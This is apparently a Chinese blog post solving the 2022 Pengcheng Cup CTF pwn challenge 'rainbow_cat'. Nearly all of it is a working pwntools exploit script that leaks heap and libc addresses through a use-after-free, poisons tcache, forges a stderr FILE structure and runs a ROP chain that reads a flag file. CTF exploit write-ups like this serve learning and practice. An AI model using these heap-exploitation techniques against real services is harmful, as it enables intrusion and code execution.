2022 鹏城杯 pwn rainbow_cat

2022 鹏城杯 pwn rainbow_cat

我也不知道我是怎么搞出来的，学技术还得看 winmt 大师的博客：https://www.cnblogs.com/winmt/articles/16440009.html

from pwn import*
# pwntools tube settings: 64-bit Linux target; log_level='debug' makes pwntools
# echo every byte sent and received, which is noisy but handy when a prompt
# string in the helpers below does not match the service exactly.
context(os='linux',arch='amd64',log_level='debug')

# Local run (commented out) vs. the lab instance reached over TCP below;
# only one of the two should be active.
#s = process('./rainbowcat')
s = remote('192.168.1.102',9999)
# Symbols and offsets later in the script are resolved against this exact
# libc build; a different build invalidates every hard-coded constant.
libc = ELF('./libc-2.33.so')

def add(index):
	"""Menu option 1: ask the service to create cat number *index*.

	Drives the two prompts in order; nothing is read back here.
	"""
	dialogue = (
		(b'Your choice >> ', b'1'),
		(b'Which cat do you want to get? ', str(index)),
	)
	for prompt, answer in dialogue:
		s.sendlineafter(prompt, answer)

def delete(index):
	"""Menu option 2: ask the service to abandon (free) cat number *index*.

	Drives the two prompts in order; nothing is read back here.
	"""
	dialogue = (
		(b'Your choice >> ', b'2'),
		(b'Which one do you want to abandon? ', str(index)),
	)
	for prompt, answer in dialogue:
		s.sendlineafter(prompt, answer)

def show(index):
	"""Menu option 3: have the service print the name of cat number *index*.

	Only drives the menu; the caller reads the response from ``s``.
	"""
	dialogue = (
		(b'Your choice >> ', b'3'),
		(b'Choose a cat to show name: ', str(index)),
	)
	for prompt, answer in dialogue:
		s.sendlineafter(prompt, answer)

def edit(index, content):
	"""Menu option 4: overwrite the name of cat number *index* with *content*.

	The first two answers go out as lines; *content* itself is sent with
	``sendafter`` so no newline is appended and binary data arrives intact.
	"""
	line_prompts = (
		(b'Your choice >> ', b'4'),
		(b'Which one?', str(index)),
	)
	for prompt, answer in line_prompts:
		s.sendlineafter(prompt, answer)
	s.sendafter(b'Rename the cat: ', content)

# Interaction sequence against the service. Every step goes through the four
# menu wrappers above; the order of calls is load-bearing and must not be
# rearranged. All numeric offsets below are tied to the libc build loaded at
# the top of the file and to this binary's heap layout.
# 0 heap_base + 0x90
# 1 heap_base + 0x10

for i in range(7):
	add(0)

add(1)
add(2)

for i in range(7):
	delete(0)
	edit(0, b'a'*0x10)

delete(0)
show(0)

s.recvuntil(b'Name:')
# recv(6) takes a 6-byte value, zero-pads it to 8 for u64, then shifts left
# by 12 (page granularity) to obtain the base the later offsets are built on.
heap_base = u64(s.recv(6).ljust(8,b'\x00')) << 12
success('heap_base=>' + hex(heap_base))

edit(0, p64((heap_base+0x10)^(heap_base >> 12)))

add(0)
add(1)

for i in range(7):
	delete(1)
	edit(1, p64(8) + b'a'*8)

delete(1)

show(1)
s.recvuntil(b'Name:')
# 0x1e0c00 is a build-specific constant for libc-2.33.so; re-derive it if the
# libc file changes rather than reusing this value.
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - 0x1e0c00
success('libc_base=>' + hex(libc_base))

__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
_IO_2_1_stderr_ = libc_base + libc.sym['_IO_2_1_stderr_']
_IO_str_jumps = libc_base + 0x1e2560
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
_IO_stdfile_2_lock = libc_base + 0x1e3660

# NOTE(review): gadget offsets are hard-coded for this libc build rather than
# looked up from the ELF; verify each one against the file before reuse.
pop_rdi_ret = libc_base + 0x0000000000028a55
pop_rsi_ret = libc_base + 0x000000000002a4cf
pop_rdx_ret = libc_base + 0x00000000000c7f32
pop_rax_ret = libc_base + 0x0000000000044c70
syscall_ret = libc_base + 0x000000000006105a
ret = libc_base + 0x0000000000026699
magic = libc_base + 0x000000000014a0a0

fake_IO_stderr_addr = heap_base + 0x10
rop = heap_base + 0x500

edit(1, p64(0)*2)

delete(0)
edit(0, b'a'*0x10)
delete(0)

edit(0, p64((heap_base+0x90)^(heap_base >> 12)))
add(0)
add(0)

edit(1, p64(1))
edit(0, p64(heap_base+0x2a0))
add(2)
#######  _IO_2_1_stderr_._chain => heap_base + 0x10
edit(1, p64(7))
delete(2)
edit(2, p64((_IO_2_1_stderr_+0x60-0x10)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2c0))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x290)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2e0))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2b0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x300))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2d0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x320))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2f0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x340))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x310)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x360))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x330)^(heap_base >> 12)) + p64(heap_base + 0x10))

edit(1, p64(0))
edit(0, p64(0))

add(2)

#####  prepare for malloc   free  memcpy

edit(1, p64(1))
edit(0, p64(heap_base + 0x20))
add(2)
edit(2, p64(0) + p16(0) + p16(1))

edit(1, p64(1))
edit(0, p64(heap_base + 0x90 + 0x60))
add(2)
edit(2, p64(0) + p64(__free_hook))

#####
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x20))
add(2)
edit(2, p64(0) + p64(0xffffffffffffffff))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xd0))
add(2)
edit(2, p64(0) + p64(_IO_str_jumps))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x80))
add(2)
edit(2, p64(0) + p64(_IO_stdfile_2_lock))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x30))
add(2)
edit(2, p64(0) + p64(fake_IO_stderr_addr + 0x100))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x40))
add(2)
edit(2, p64(fake_IO_stderr_addr + 0x140) + p64(0))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x100))
add(2)
edit(2, p64(magic) + p64(heap_base + 0x10 + 0x1f0))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xf0))
add(2)
edit(2, p64(0) + p64(0x21))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x110))
add(2)
edit(2, p64(0) + p64(0x21))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x210))
add(2)
edit(2, p64(setcontext_61))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x1f0 + 0xa0))
add(2)
edit(2, p64(rop) + p64(ret))

###### rop

edit(1, p64(1))
edit(0, p64(rop+0x100))
add(2)
edit(2, b'./flag\x00')

edit(1, p64(1))
edit(0, p64(rop))
add(2)
edit(2, p64(pop_rdi_ret) + p64(rop+0x100))

edit(1, p64(1))
edit(0, p64(rop+0x10))
add(2)
edit(2, p64(pop_rsi_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x20))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x30))
add(2)
edit(2, p64(pop_rax_ret) + p64(2))

edit(1, p64(1))
edit(0, p64(rop+0x40))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

edit(1, p64(1))
edit(0, p64(rop+0x50))
add(2)
edit(2, p64(pop_rdi_ret) + p64(3))

edit(1, p64(1))
edit(0, p64(rop+0x60))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))

edit(1, p64(1))
edit(0, p64(rop+0x70))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))

edit(1, p64(1))
edit(0, p64(rop+0x80))
add(2)
edit(2, p64(pop_rax_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x90))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

edit(1, p64(1))
edit(0, p64(rop+0xa0))
add(2)
edit(2, p64(pop_rdi_ret) + p64(1))

edit(1, p64(1))
edit(0, p64(rop+0xb0))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))

edit(1, p64(1))
edit(0, p64(rop+0xc0))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))

edit(1, p64(1))
edit(0, p64(rop+0xd0))
add(2)
edit(2, p64(pop_rax_ret) + p64(1))

edit(1, p64(1))
edit(0, p64(rop+0xe0))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

#### trigger

edit(1, p64(1))
edit(0, p64(_IO_2_1_stderr_))

# Uncomment to break into a debugger before the final allocation (local run only).
#gdb.attach(s)
#pause()

add(2)
s.interactive()
posted @ 2022-07-03 16:40  狒猩橙